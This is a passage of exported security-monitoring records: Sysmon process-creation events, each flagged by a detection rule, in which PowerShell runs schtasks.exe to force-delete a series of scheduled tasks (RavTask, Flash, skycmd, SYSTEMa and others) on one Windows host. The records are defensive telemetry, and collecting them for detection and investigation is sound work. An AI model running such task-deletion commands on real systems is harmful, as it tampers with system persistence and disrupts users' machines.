Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN GooglePingConfigs /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.485",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:40.805 +ProcessGuid: {df9fc3d3-b418-5ecf-0000-001031533100} +ProcessId: 3664 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN RavTask /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN RavTask /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:40.836041500Z"",""eventRecordID"":""3966"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:40.805\r\nProcessGuid: {df9fc3d3-b418-5ecf-0000-001031533100}\r\nProcessId: 3664\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN RavTask /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:40.805"",""processGuid"":""{df9fc3d3-b418-5ecf-0000-001031533100}"",""processId"":""3664"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN RavTask /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.479",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:40.727 +ProcessGuid: {df9fc3d3-b418-5ecf-0000-00109a513100} +ProcessId: 6300 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Flash /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Flash /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:40.735542400Z"",""eventRecordID"":""3965"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:40.727\r\nProcessGuid: {df9fc3d3-b418-5ecf-0000-00109a513100}\r\nProcessId: 6300\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Flash /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:40.727"",""processGuid"":""{df9fc3d3-b418-5ecf-0000-00109a513100}"",""processId"":""6300"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Flash /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.453",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:40.705 +ProcessGuid: {df9fc3d3-b418-5ecf-0000-00100c503100} +ProcessId: 7564 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Netframework /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Netframework /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:40.707042900Z"",""eventRecordID"":""3964"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:40.705\r\nProcessGuid: {df9fc3d3-b418-5ecf-0000-00100c503100}\r\nProcessId: 7564\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Netframework /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:40.705"",""processGuid"":""{df9fc3d3-b418-5ecf-0000-00100c503100}"",""processId"":""7564"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Netframework /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.435",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:40.680 +ProcessGuid: {df9fc3d3-b418-5ecf-0000-0010064e3100} +ProcessId: 7724 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Miscfost /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Miscfost /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:40.682245000Z"",""eventRecordID"":""3963"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:40.680\r\nProcessGuid: {df9fc3d3-b418-5ecf-0000-0010064e3100}\r\nProcessId: 7724\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Miscfost /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:40.680"",""processGuid"":""{df9fc3d3-b418-5ecf-0000-0010064e3100}"",""processId"":""7724"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Miscfost /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.420",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:40.658 +ProcessGuid: {df9fc3d3-b418-5ecf-0000-0010694c3100} +ProcessId: 7072 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN skycmd /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN skycmd /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:40.661548500Z"",""eventRecordID"":""3962"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:40.658\r\nProcessGuid: {df9fc3d3-b418-5ecf-0000-0010694c3100}\r\nProcessId: 7072\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN skycmd /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:40.658"",""processGuid"":""{df9fc3d3-b418-5ecf-0000-0010694c3100}"",""processId"":""7072"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN skycmd /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.405",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:40.631 +ProcessGuid: {df9fc3d3-b418-5ecf-0000-0010d64a3100} +ProcessId: 7968 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN SYSTEMa /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEMa /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:40.634090700Z"",""eventRecordID"":""3961"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:40.631\r\nProcessGuid: {df9fc3d3-b418-5ecf-0000-0010d64a3100}\r\nProcessId: 7968\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEMa /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:40.631"",""processGuid"":""{df9fc3d3-b418-5ecf-0000-0010d64a3100}"",""processId"":""7968"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN SYSTEMa /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 